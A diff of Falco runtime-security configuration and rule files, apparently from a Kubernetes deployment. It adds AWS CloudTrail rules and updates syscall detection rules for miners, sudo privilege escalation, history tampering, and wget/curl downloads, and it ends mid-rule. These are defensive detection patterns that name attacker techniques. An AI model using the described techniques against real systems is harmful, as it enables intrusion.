keep_alive is set to true, the file will be opened once and\n# continuously written to, with each output message on its own\n# line. If keep_alive is set to false, the file will be re-opened\n# for each output message.\n#\n# Also, the file will be closed and reopened if falco is signaled with\n# SIGUSR1.\nfile_output:\n  enabled: false\n  keep_alive: false\n  filename: ./events.txt\n\nstdout_output:\n  enabled: true\n\n# Falco contains an embedded webserver that can be used to accept K8s\n# Audit Events. These config options control the behavior of that\n# webserver. (By default, the webserver is disabled).\n#\n# The ssl_certificate is a combination SSL Certificate and corresponding\n# key contained in a single file. You can generate a key/cert as follows:\n#\n# $ openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem\n# $ cat certificate.pem key.pem > falco.pem\n# $ sudo cp falco.pem /etc/falco/falco.pem\nwebserver:\n  enabled: true\n  listen_port: 8765\n  k8s_audit_endpoint: /k8s-audit\n  k8s_healthz_endpoint: /healthz\n  ssl_enabled: false\n  ssl_certificate: /etc/falco/certs/server.pem\n\n# If keep_alive is set to true, the program will be started once and\n# continuously written to, with each output message on its own\n# line. If keep_alive is set to false, the program will be re-spawned\n# for each output message.\n#\n# Also, the program will be closed and reopened if falco is signaled with\n# SIGUSR1.\nprogram_output:\n  enabled: false\n  keep_alive: false\n  program: |\n    mail -s \"Falco Notification\" someone@example.com\n\nhttp_output:\n  enabled: true\n  url: 'http://falco-sidekick-falcosidekick:2801'\n  user_agent: falcosecurity/falco\n\n\n# Falco supports running a gRPC server with two main binding types\n# 1. Over the network with mandatory mutual TLS authentication (mTLS)\n# 2. Over a local unix socket with no authentication\n# By default, the gRPC server is disabled, with no enabled services (see grpc_output)\n# please comment/uncomment and change accordingly the options below to configure it.\n# Important note: if Falco has any troubles creating the gRPC server\n# this information will be logged, however the main Falco daemon will not be stopped.\n# gRPC server over network with (mandatory) mutual TLS configuration.\n# This gRPC server is secure by default so you need to generate certificates and update their paths here.\n# By default the gRPC server is off.\n# You can configure the address to bind and expose it.\n# By modifying the threadiness configuration you can fine-tune the number of threads (and context) it will use.\n# grpc:\n#   enabled: true\n#   bind_address: \"0.0.0.0:5060\"\n#   # when threadiness is 0, Falco sets it by automatically figuring out the number of online cores\n#   threadiness: 0\n#   private_key: \"/etc/falco/certs/server.key\"\n#   cert_chain: \"/etc/falco/certs/server.crt\"\n#   root_certs: \"/etc/falco/certs/ca.crt\"\ngrpc:\n  enabled: true\n  threadiness: 0\n  bind_address: \"unix:///var/run/falco/falco.sock\"\n  \n\n# gRPC output service.\n# By default it is off.\n# By enabling this all the output events will be kept in memory until you read them with a gRPC client.\n# Make sure to have a consumer for them or leave this disabled.\ngrpc_output:\n  enabled: true\n\n# Container orchestrator metadata fetching params\nmetadata_download:\n  max_mb: 100\n  chunk_wait_us: 1000\n  watch_freq_sec: 1"
   application_rules.yaml: |-
     #
     # Copyright (C) 2019 The Falco Authors.
@@ -343,7 +343,449 @@
     #   condition: proc.name in (http_server_binaries) and inbound and fd.sport != 80 and fd.sport != 443
     #   output: "Inbound network traffic to HTTP Server on unexpected port (connection=%fd.name)"
     #   priority: WARNING
-  falco_rules.local.yaml: |
+  aws_cloudtrail_rules.yaml: |
+    #
+    # Copyright (C) 2022 The Falco Authors.
+    #
+    #
+    # Licensed under the Apache License, Version 2.0 (the "License");
+    # you may not use this file except in compliance with the License.
+    # You may obtain a copy of the License at
+    #
+    #     http://www.apache.org/licenses/LICENSE-2.0
+    #
+    # Unless required by applicable law or agreed to in writing, software
+    # distributed under the License is distributed on an "AS IS" BASIS,
+    # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+    # See the License for the specific language governing permissions and
+    # limitations under the License.
+    #
+
+    # All rules files related to plugins should require engine version 10
+    - required_engine_version: 10
+
+    # These rules can be read by cloudtrail plugin version 0.1.0, or
+    # anything semver-compatible.
+    - required_plugin_versions:
+      - name: cloudtrail
+        version: 0.2.3
+      - name: json
+        version: 0.2.2
+
+    # Note that this rule is disabled by default. It's useful only to
+    # verify that the cloudtrail plugin is sending events properly.  The
+    # very broad condition evt.num > 0 only works because the rule source
+    # is limited to aws_cloudtrail. This ensures that the only events that
+    # are matched against the rule are from the cloudtrail plugin (or
+    # a different plugin with the same source).
+    - rule: All Cloudtrail Events
+      desc: Match all cloudtrail events.
+      condition:
+        evt.num > 0
+      output: Some Cloudtrail Event (evtnum=%evt.num info=%evt.plugininfo ts=%evt.time.iso8601 id=%ct.id error=%ct.error)
+      priority: DEBUG
+      tags:
+      - cloud
+      - aws
+      source: aws_cloudtrail
+      enabled: false
+
+    - rule: Console Login Through Assume Role
+      desc: Detect a console login through Assume Role.
+      condition:
+        ct.name="ConsoleLogin" and not ct.error exists
+        and ct.user.identitytype="AssumedRole"
+        and json.value[/responseElements/ConsoleLogin]="Success"
+      output:
+        Detected a console login through Assume Role
+        (principal=%ct.user.principalid,
+        assumedRole=%ct.user.arn,
+        requesting IP=%ct.srcip,
+        AWS region=%ct.region)
+      priority: WARNING
+      tags:
+      - cloud
+      - aws
+      - aws_console
+      - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Console Login Without MFA
+      desc: Detect a console login without MFA.
+      condition:
+        ct.name="ConsoleLogin" and not ct.error exists
+        and ct.user.identitytype!="AssumedRole"
+        and json.value[/responseElements/ConsoleLogin]="Success"
+        and json.value[/additionalEventData/MFAUsed]="No"
+      output:
+        Detected a console login without MFA
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_console
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Console Root Login Without MFA
+      desc: Detect root console login without MFA.
+      condition:
+        ct.name="ConsoleLogin" and not ct.error exists
+        and json.value[/additionalEventData/MFAUsed]="No"
+        and ct.user.identitytype!="AssumedRole"
+        and json.value[/responseElements/ConsoleLogin]="Success"
+        and ct.user.identitytype="Root"
+      output:
+        Detected a root console login without MFA.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_console
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Deactivate MFA for Root User
+      desc: Detect deactivating MFA configuration for root.
+      condition:
+        ct.name="DeactivateMFADevice" and not ct.error exists
+        and ct.user.identitytype="Root"
+        and ct.request.username="AWS ROOT USER"
+      output:
+        Multi Factor Authentication configuration has been disabled for root
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         MFA serial number=%ct.request.serialnumber)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Create AWS user
+      desc: Detect creation of a new AWS user.
+      condition:
+        ct.name="CreateUser" and not ct.error exists
+      output:
+        A new AWS user has been created
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         new user created=%ct.request.username)
+      priority: INFO
+      tags:
+        - cloud
+        - aws
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Create Group
+      desc: Detect creation of a new user group.
+      condition:
+        ct.name="CreateGroup" and not ct.error exists
+      output:
+        A new user group has been created.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         group name=%ct.request.groupname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Delete Group
+      desc: Detect deletion of a user group.
+      condition:
+        ct.name="DeleteGroup" and not ct.error exists
+      output:
+        A user group has been deleted.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         group name=%ct.request.groupname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: ECS Service Created
+      desc: Detect a new service is created in ECS.
+      condition:
+        ct.src="ecs.amazonaws.com" and
+        ct.name="CreateService" and
+        not ct.error exists
+      output:
+        A new service has been created in ECS
+        (requesting user=%ct.user,
+        requesting IP=%ct.srcip,
+        AWS region=%ct.region,
+        cluster=%ct.request.cluster,
+        service name=%ct.request.servicename,
+        task definition=%ct.request.taskdefinition)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_ecs
+        - aws_fargate
+      source: aws_cloudtrail
+
+    - rule: ECS Task Run or Started
+      desc: Detect a new task is started in ECS.
+      condition:
+        ct.src="ecs.amazonaws.com" and
+        (ct.name="RunTask" or ct.name="StartTask") and
+        not ct.error exists
+      output:
+        A new task has been started in ECS
+        (requesting user=%ct.user,
+        requesting IP=%ct.srcip,
+        AWS region=%ct.region,
+        cluster=%ct.request.cluster,
+        task definition=%ct.request.taskdefinition)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_ecs
+        - aws_fargate
+      source: aws_cloudtrail
+
+    - rule: Create Lambda Function
+      desc: Detect creation of a Lambda function.
+      condition:
+        ct.name="CreateFunction20150331" and not ct.error exists
+      output:
+        Lambda function has been created.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         lambda function=%ct.request.functionname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_lambda
+      source: aws_cloudtrail
+
+    - rule: Update Lambda Function Code
+      desc: Detect updates to a Lambda function code.
+      condition:
+        ct.name="UpdateFunctionCode20150331v2" and not ct.error exists
+      output:
+        The code of a Lambda function has been updated.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         lambda function=%ct.request.functionname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_lambda
+      source: aws_cloudtrail
+
+    - rule: Update Lambda Function Configuration
+      desc: Detect updates to a Lambda function configuration.
+      condition:
+        ct.name="UpdateFunctionConfiguration20150331v2" and not ct.error exists
+      output:
+        The configuration of a Lambda function has been updated.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         lambda function=%ct.request.functionname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_lambda
+      source: aws_cloudtrail
+
+    - rule: Run Instances
+      desc: Detect launching of a specified number of instances.
+      condition:
+        ct.name="RunInstances" and not ct.error exists
+      output:
+        A number of instances have been launched.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         availability zone=%ct.request.availabilityzone,
+         subnet id=%ct.response.subnetid,
+         reservation id=%ct.response.reservationid)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_ec2
+      source: aws_cloudtrail
+
+    # Only instances launched on regions in this list are approved.
+    - list: approved_regions
+      items:
+        - us-east-0
+
+    - rule: Run Instances in Non-approved Region
+      desc: Detect launching of a specified number of instances in a non-approved region.
+      condition:
+        ct.name="RunInstances" and not ct.error exists and
+        not ct.region in (approved_regions)
+      output:
+        A number of instances have been launched in a non-approved region.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         availability zone=%ct.request.availabilityzone,
+         subnet id=%ct.response.subnetid,
+         reservation id=%ct.response.reservationid,
+         image id=%json.value[/responseElements/instancesSet/items/0/instanceId])
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_ec2
+      source: aws_cloudtrail
+
+    - rule: Delete Bucket Encryption
+      desc: Detect deleting configuration to use encryption for bucket storage.
+      condition:
+        ct.name="DeleteBucketEncryption" and not ct.error exists
+      output:
+        A encryption configuration for a bucket has been deleted
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         bucket=%s3.bucket)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: Delete Bucket Public Access Block
+      desc: Detect deleting blocking public access to bucket.
+      condition:
+        ct.name="PutBucketPublicAccessBlock" and not ct.error exists and
+        json.value[/requestParameters/publicAccessBlock]="" and
+          (json.value[/requestParameters/PublicAccessBlockConfiguration/RestrictPublicBuckets]=false or
+          json.value[/requestParameters/PublicAccessBlockConfiguration/BlockPublicPolicy]=false or
+          json.value[/requestParameters/PublicAccessBlockConfiguration/BlockPublicAcls]=false or
+          json.value[/requestParameters/PublicAccessBlockConfiguration/IgnorePublicAcls]=false)
+      output:
+        A public access block for a bucket has been deleted
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         bucket=%s3.bucket)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: List Buckets
+      desc: Detect listing of all S3 buckets.
+      condition:
+        ct.name="ListBuckets" and not ct.error exists
+      output:
+        A list of all S3 buckets has been requested.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         host=%ct.request.host)
+      priority: WARNING
+      enabled: false
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: Put Bucket ACL
+      desc: Detect setting the permissions on an existing bucket using access control lists.
+      condition:
+        ct.name="PutBucketAcl" and not ct.error exists
+      output:
+        The permissions on an existing bucket have been set using access control lists.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         bucket name=%s3.bucket)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: Put Bucket Policy
+      desc: Detect applying an Amazon S3 bucket policy to an Amazon S3 bucket.
+      condition:
+        ct.name="PutBucketPolicy" and not ct.error exists
+      output:
+        An Amazon S3 bucket policy has been applied to an Amazon S3 bucket.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         bucket name=%s3.bucket,
+         policy=%ct.request.policy)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: CloudTrail Trail Created
+      desc: Detect creation of a new trail.
+      condition:
+        ct.name="CreateTrail" and not ct.error exists
+      output:
+        A new trail has been created.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         trail name=%ct.request.name)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_cloudtrail
+      source: aws_cloudtrail
+
+    - rule: CloudTrail Logging Disabled
+      desc: The CloudTrail logging has been disabled, this could be potentially malicious.
+      condition:
+        ct.name="StopLogging" and not ct.error exists
+      output:
+        The CloudTrail logging has been disabled.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         resource name=%ct.request.name)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_cloudtrail
+      source: aws_cloudtrail
+  falco_rules.local.yaml: |-
     #
     # Copyright (C) 2019 The Falco Authors.
     #
@@ -374,9 +816,9 @@
     #   tags: [users, container]
 
     # Or override/append to any rule, macro, or list from the Default Rules
-  falco_rules.yaml: |
+  falco_rules.yaml: |-
     #
-    # Copyright (C) 2020 The Falco Authors.
+    # Copyright (C) 2022 The Falco Authors.
     #
     #
     # Licensed under the Apache License, Version 2.0 (the "License");
@@ -406,13 +848,13 @@
     #   condition: (syscall.type=read and evt.dir=> and fd.type in (file, directory))
 
     - macro: open_write
-      condition: (evt.type=open or evt.type=openat) and evt.is_open_write=true and fd.typechar='f' and fd.num>=0
+      condition: evt.type in (open,openat,openat2) and evt.is_open_write=true and fd.typechar='f' and fd.num>=0
 
     - macro: open_read
-      condition: (evt.type=open or evt.type=openat) and evt.is_open_read=true and fd.typechar='f' and fd.num>=0
+      condition: evt.type in (open,openat,openat2) and evt.is_open_read=true and fd.typechar='f' and fd.num>=0
 
     - macro: open_directory
-      condition: (evt.type=open or evt.type=openat) and evt.is_open_read=true and fd.typechar='d' and fd.num>=0
+      condition: evt.type in (open,openat,openat2) and evt.is_open_read=true and fd.typechar='d' and fd.num>=0
 
     - macro: never_true
       condition: (evt.num=0)
@@ -440,11 +882,14 @@
       condition: rename or remove
 
     - macro: spawned_process
-      condition: evt.type = execve and evt.dir=<
+      condition: evt.type in (execve, execveat) and evt.dir=<
 
     - macro: create_symlink
       condition: evt.type in (symlink, symlinkat) and evt.dir=<
 
+    - macro: create_hardlink
+      condition: evt.type in (link, linkat) and evt.dir=<
+
     - macro: chmod
       condition: (evt.type in (chmod, fchmod, fchmodat) and evt.dir=<)
 
@@ -593,13 +1038,13 @@
     - list: deb_binaries
       items: [dpkg, dpkg-preconfigu, dpkg-reconfigur, dpkg-divert, apt, apt-get, aptitude,
         frontend, preinst, add-apt-reposit, apt-auto-remova, apt-key,
-        apt-listchanges, unattended-upgr, apt-add-reposit, apt-config, apt-cache, apt.systemd.dai
+        apt-listchanges, unattended-upgr, apt-add-reposit, apt-cache, apt.systemd.dai
         ]
 
     # The truncated dpkg-preconfigu is intentional, process names are
-    # truncated at the sysdig level.
+    # truncated at the falcosecurity-libs level.
     - list: package_mgmt_binaries
-      items: [rpm_binaries, deb_binaries, update-alternat, gem, pip, pip3, sane-utils.post, alternatives, chef-client, apk, snapd]
+      items: [rpm_binaries, deb_binaries, update-alternat, gem, npm, pip, pip3, sane-utils.post, alternatives, chef-client, apk, snapd]
 
     - macro: package_mgmt_procs
       condition: proc.name in (package_mgmt_binaries)
@@ -710,7 +1155,7 @@
     # for efficiency.
     - macro: inbound_outbound
       condition: >
-        ((((evt.type in (accept,listen,connect) and evt.dir=<)) or
+        ((((evt.type in (accept,listen,connect) and evt.dir=<)) and
          (fd.typechar = 4 or fd.typechar = 6)) and
          (fd.ip != "0.0.0.0" and fd.net != "127.0.0.0/8") and
          (evt.rawres >= 0 or evt.res = EINPROGRESS))
@@ -938,7 +1383,7 @@
 
     # Qualys seems to run a variety of shell subprocesses, at various
     # levels. This checks at a few levels without the cost of a full
-    # proc.aname, which traverses the full parent heirarchy.
+    # proc.aname, which traverses the full parent hierarchy.
     - macro: run_by_qualys
       condition: >
         (proc.pname=qualys-cloud-ag or
@@ -1149,6 +1594,9 @@
     - macro: centrify_writing_krb
       condition: (proc.name in (adjoin,addns) and fd.name startswith /etc/krb5)
 
+    - macro: sssd_writing_krb
+      condition: (proc.name=adcli and proc.aname[2]=sssd and fd.name startswith /etc/krb5)
+
     - macro: cockpit_writing_conf
       condition: >
         ((proc.pname=cockpit-kube-la or proc.aname[2]=cockpit-kube-la)
@@ -1477,7 +1925,7 @@
       condition: (proc.name=oc and fd.name startswith /etc/origin/node)
 
     - macro: keepalived_writing_conf
-      condition: (proc.name=keepalived and fd.name=/etc/keepalived/keepalived.conf)
+      condition: (proc.name in (keepalived, kube-keepalived) and fd.name=/etc/keepalived/keepalived.conf)
 
     - macro: etcd_manager_updating_dns
       condition: (container and proc.name=etcd-manager and fd.name=/etc/hosts)
@@ -1592,6 +2040,7 @@
         and not nginx_writing_certs
         and not chef_client_writing_conf
         and not centrify_writing_krb
+        and not sssd_writing_krb
         and not cockpit_writing_conf
         and not ipsec_writing_conf
         and not httpd_writing_ssl_conf
@@ -2203,6 +2652,7 @@
         k8s.gcr.io/ip-masq-agent-amd64,
         k8s.gcr.io/kube-proxy,
         k8s.gcr.io/prometheus-to-sd,
+        public.ecr.aws/falcosecurity/falco,
         quay.io/calico/node,
         sysdig/sysdig,
         sematext_images
@@ -2231,7 +2681,7 @@
     - list: falco_sensitive_mount_images
       items: [
         docker.io/sysdig/sysdig, sysdig/sysdig,
-        docker.io/falcosecurity/falco, falcosecurity/falco,
+        docker.io/falcosecurity/falco, falcosecurity/falco, public.ecr.aws/falcosecurity/falco,
         gcr.io/google_containers/hyperkube,
         gcr.io/google_containers/kube-proxy, docker.io/calico/node,
         docker.io/rook/toolbox, docker.io/cloudnativelabs/kube-router, docker.io/consul,
@@ -2247,19 +2697,6 @@
                   container.image.repository in (falco_sensitive_mount_images) or
                   container.image.repository startswith quay.io/sysdig/)
 
-    # These container images are allowed to run with hostnetwork=true
-    - list: falco_hostnetwork_images
-      items: [
-        gcr.io/google-containers/prometheus-to-sd,
-        gcr.io/projectcalico-org/typha,
-        gcr.io/projectcalico-org/node,
-        gke.gcr.io/gke-metadata-server,
-        gke.gcr.io/kube-proxy,
-        gke.gcr.io/netd-amd64,
-        k8s.gcr.io/ip-masq-agent-amd64
-        k8s.gcr.io/prometheus-to-sd,
-        ]
-
     # Add conditions to this macro (probably in a separate file,
     # overwriting this macro) to specify additional containers that are
     # allowed to perform sensitive mounts.
@@ -2282,12 +2719,13 @@
 
     # For now, only considering a full mount of /etc as
     # sensitive. Ideally, this would also consider all subdirectories
-    # below /etc as well, but the globbing mechanism used by sysdig
+    # below /etc as well, but the globbing mechanism
     # doesn't allow exclusions of a full pattern, only single characters.
     - macro: sensitive_mount
       condition: (container.mount.dest[/proc*] != "N/A" or
                   container.mount.dest[/var/run/docker.sock] != "N/A" or
                   container.mount.dest[/var/run/crio/crio.sock] != "N/A" or
+                  container.mount.dest[/run/containerd/containerd.sock] != "N/A" or
                   container.mount.dest[/var/lib/kubelet] != "N/A" or
                   container.mount.dest[/var/lib/kubelet/pki] != "N/A" or
                   container.mount.dest[/] != "N/A" or
@@ -2574,7 +3012,7 @@
     #   output: "sshd sent error message to syslog (error=%evt.buffer)"
     #   priority: WARNING
 
-    - macro: somebody_becoming_themself
+    - macro: somebody_becoming_themselves
       condition: ((user.name=nobody and evt.arg.uid=nobody) or
                   (user.name=www-data and evt.arg.uid=www-data) or
                   (user.name=_apt and evt.arg.uid=_apt) or
@@ -2612,7 +3050,7 @@
         evt.type=setuid and evt.dir=>
         and (known_user_in_container or not container)
         and not (user.name=root or user.uid=0)
-        and not somebody_becoming_themself
+        and not somebody_becoming_themselves
         and not proc.name in (known_setuid_binaries, userexec_binaries, mail_binaries, docker_binaries,
                               nomachine_binaries)
         and not proc.name startswith "runc:"
@@ -2636,7 +3074,7 @@
         activity by any programs that can manage users, passwords, or permissions. sudo and su are excluded.
         Activity in containers is also excluded--some containers create custom users on top
         of a base linux distribution at startup.
-        Some innocuous commandlines that don't actually change anything are excluded.
+        Some innocuous command lines that don't actually change anything are excluded.
       condition: >
         spawned_process and proc.name in (user_mgmt_binaries) and
         not proc.name in (su, sudo, lastlog, nologin, unix_chkpwd) and not container and
@@ -2672,7 +3110,7 @@
       desc: creating any files below /dev other than known programs that manage devices. Some rootkits hide files in /dev.
       condition: >
         fd.directory = /dev and
-        (evt.type = creat or ((evt.type = open or evt.type = openat) and evt.arg.flags contains O_CREAT))
+        (evt.type = creat or (evt.type in (open,openat,openat2) and evt.arg.flags contains O_CREAT))
         and not proc.name in (dev_creation_binaries)
         and not fd.name in (allowed_dev_files)
         and not fd.name startswith /dev/tty
@@ -2686,7 +3124,7 @@
     # explicitly enumerate the container images that you want to allow
     # access to EC2 metadata. In this main falco rules file, there isn't
     # any way to know all the containers that should have access, so any
-    # container is alllowed, by repeating the "container" macro. In the
+    # container is allowed, by repeating the "container" macro. In the
     # overridden macro, the condition would look something like
     # (container.image.repository = vendor/container-1 or
     # container.image.repository = vendor/container-2 or ...)
@@ -2740,7 +3178,8 @@
          docker.io/sysdig/sysdig, docker.io/falcosecurity/falco,
          sysdig/sysdig, falcosecurity/falco,
          fluent/fluentd-kubernetes-daemonset, prom/prometheus,
-         ibm_cloud_containers)
+         ibm_cloud_containers,
+         public.ecr.aws/falcosecurity/falco)
          or (k8s.ns.name = "kube-system"))
 
     - macro: k8s_api_server
@@ -2948,15 +3387,15 @@
       condition: >
         (modify and (
           evt.arg.name contains "bash_history" or
-          evt.arg.name contains "zsh_history" or
+          evt.arg.name endswith "zsh_history" or
           evt.arg.name contains "fish_read_history" or
           evt.arg.name endswith "fish_history" or
           evt.arg.oldpath contains "bash_history" or
-          evt.arg.oldpath contains "zsh_history" or
+          evt.arg.oldpath endswith "zsh_history" or
           evt.arg.oldpath contains "fish_read_history" or
           evt.arg.oldpath endswith "fish_history" or
           evt.arg.path contains "bash_history" or
-          evt.arg.path contains "zsh_history" or
+          evt.arg.path endswith "zsh_history" or
           evt.arg.path contains "fish_read_history" or
           evt.arg.path endswith "fish_history"))
 
@@ -2964,7 +3403,7 @@
       condition: >
         (open_write and (
           fd.name contains "bash_history" or
-          fd.name contains "zsh_history" or
+          fd.name endswith "zsh_history" or
           fd.name contains "fish_read_history" or
           fd.name endswith "fish_history") and evt.arg.flags contains "O_TRUNC")
 
@@ -3003,7 +3442,7 @@
       items: [hyperkube, kubelet, k3s-agent]
 
     # This macro should be overridden in user rules as needed. This is useful if a given application
-    # should not be ignored alltogether with the user_known_chmod_applications list, but only in
+    # should not be ignored altogether with the user_known_chmod_applications list, but only in
     # specific conditions.
     - macro: user_known_set_setuid_or_setgid_bit_conditions
       condition: (never_true)
@@ -3082,8 +3521,18 @@
         create_symlink and
         (evt.arg.target in (sensitive_file_names) or evt.arg.target in (sensitive_directory_names))
       output: >
-        Symlinks created over senstivie files (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline target=%evt.arg.target linkpath=%evt.arg.linkpath parent_process=%proc.pname)
-      priority: NOTICE
+        Symlinks created over sensitive files (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline target=%evt.arg.target linkpath=%evt.arg.linkpath parent_process=%proc.pname)
+      priority: WARNING
+      tags: [file, mitre_exfiltration]
+
+    - rule: Create Hardlink Over Sensitive Files
+      desc: Detect hardlink created over sensitive files
+      condition: >
+        create_hardlink and
+        (evt.arg.oldpath in (sensitive_file_names))
+      output: >
+        Hardlinks created over sensitive files (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline target=%evt.arg.oldpath linkpath=%evt.arg.newpath parent_process=%proc.pname)
+      priority: WARNING
       tags: [file, mitre_exfiltration]
 
     - list: miner_ports
@@ -3179,7 +3628,7 @@
       condition: (evt.type in (sendto, sendmsg) and evt.dir=< and (fd.net != "127.0.0.0/8" and not fd.snet in (rfc_1918_addresses)) and ((minerpool_http) or (minerpool_https) or (minerpool_other)))
 
     - macro: trusted_images_query_miner_domain_dns
-      condition: (container.image.repository in (docker.io/falcosecurity/falco, falcosecurity/falco))
+      condition: (container.image.repository in (docker.io/falcosecurity/falco, falcosecurity/falco, public.ecr.aws/falcosecurity/falco))
       append: false
 
     # The rule is disabled by default.
@@ -3188,13 +3637,13 @@
       desc: Miners typically connect to miner pools on common ports.
       condition: net_miner_pool and not trusted_images_query_miner_domain_dns
       enabled: false
-      output: Outbound connection to IP/Port flagged by cryptoioc.ch (command=%proc.cmdline port=%fd.rport ip=%fd.rip container=%container.info image=%container.image.repository)
+      output: Outbound connection to IP/Port flagged by https://cryptoioc.ch (command=%proc.cmdline port=%fd.rport ip=%fd.rip container=%container.info image=%container.image.repository)
       priority: CRITICAL
       tags: [network, mitre_execution]
 
     - rule: Detect crypto miners using the Stratum protocol
       desc: Miners typically specify the mining pool to connect to with a URI that begins with 'stratum+tcp'
-      condition: spawned_process and proc.cmdline contains "stratum+tcp"
+      condition: spawned_process and (proc.cmdline contains "stratum+tcp" or proc.cmdline contains "stratum2+tcp" or proc.cmdline contains "stratum+ssl" or proc.cmdline contains "stratum2+ssl")
       output: Possible miner running (command=%proc.cmdline container=%container.info image=%container.image.repository)
       priority: CRITICAL
       tags: [process, mitre_execution]
@@ -3330,7 +3779,7 @@
 
     # The two Container Drift rules below will fire when a new executable is created in a container.
     # There are two ways to create executables - file is created with execution permissions or permissions change of existing file.
-    # We will use a new sysdig filter, is_open_exec, to find all files creations with execution permission, and will trace all chmods in a container.
+    # We will use a new filter, is_open_exec, to find all files creations with execution permission, and will trace all chmods in a container.
     # The use case we are targeting here is an attempt to execute code that was not shipped as part of a container (drift) -
     # an activity that might be malicious or non-compliant.
     # Two things to pay attention to:
@@ -3363,7 +3812,7 @@
     - rule: Container Drift Detected (open+create)
       desc: New executable created in a container due to open+create
       condition: >
-        evt.type in (open,openat,creat) and
+        evt.type in (open,openat,openat2,creat) and
         evt.is_open_exec=true and
         container and
         not runc_writing_exec_fifo and
@@ -3413,7 +3862,7 @@
     # A privilege escalation to root through heap-based buffer overflow
     - rule: Sudo Potential Privilege Escalation
       desc: Privilege escalation vulnerability affecting sudo (<= 1.9.5p2). Executing sudo using sudoedit -s or sudoedit -i command with command-line argument that ends with a single backslash character from an unprivileged user it's possible to elevate the user privileges to root.
-      condition: spawned_process and user.uid != 0 and proc.name=sudoedit and (proc.args contains -s or proc.args contains -i) and (proc.args contains "\ " or proc.args endswith \)
+      condition: spawned_process and user.uid != 0 and (proc.name=sudoedit or proc.name = sudo) and (proc.args contains -s or proc.args contains -i or proc.args contains --login) and (proc.args contains "\ " or proc.args endswith \)
       output: "Detect Sudo Privilege Escalation Exploit (CVE-2021-3156) (user=%user.name parent=%proc.pname cmdline=%proc.cmdline %container.info)"
       priority: CRITICAL
       tags: [filesystem, mitre_privilege_escalation]
@@ -3432,7 +3881,7 @@
       condition: (proc.args="" or proc.args intersects ("-V", "-l", "-h"))
 
     - rule: Mount Launched in Privileged Container
-      desc: Detect file system mount happened inside a privilegd container which might lead to container escape.
+      desc: Detect file system mount happened inside a privileged container which might lead to container escape.
       condition: >
         spawned_process and container
         and container.privileged=true
@@ -3460,6 +3909,51 @@
       priority: CRITICAL
       tags: [syscall, mitre_defense_evasion]
 
+    - list: ingress_remote_file_copy_binaries
+      items: [wget]
+
+    - macro: ingress_remote_file_copy_procs
+      condition: (proc.name in (ingress_remote_file_copy_binaries))
+
+    # Users should overwrite this macro to specify conditions under which a
+    # Custom condition for use of ingress remote file copy tool in container
+    - macro: user_known_ingress_remote_file_copy_activities
+      condition: (never_true)
+
+    -  macro: curl_download
+       condition: proc.name = curl and
+                  (proc.cmdline contains " > " or
+                  proc.cmdline contains " >> " or
+                  proc.cmdline contains " | " or
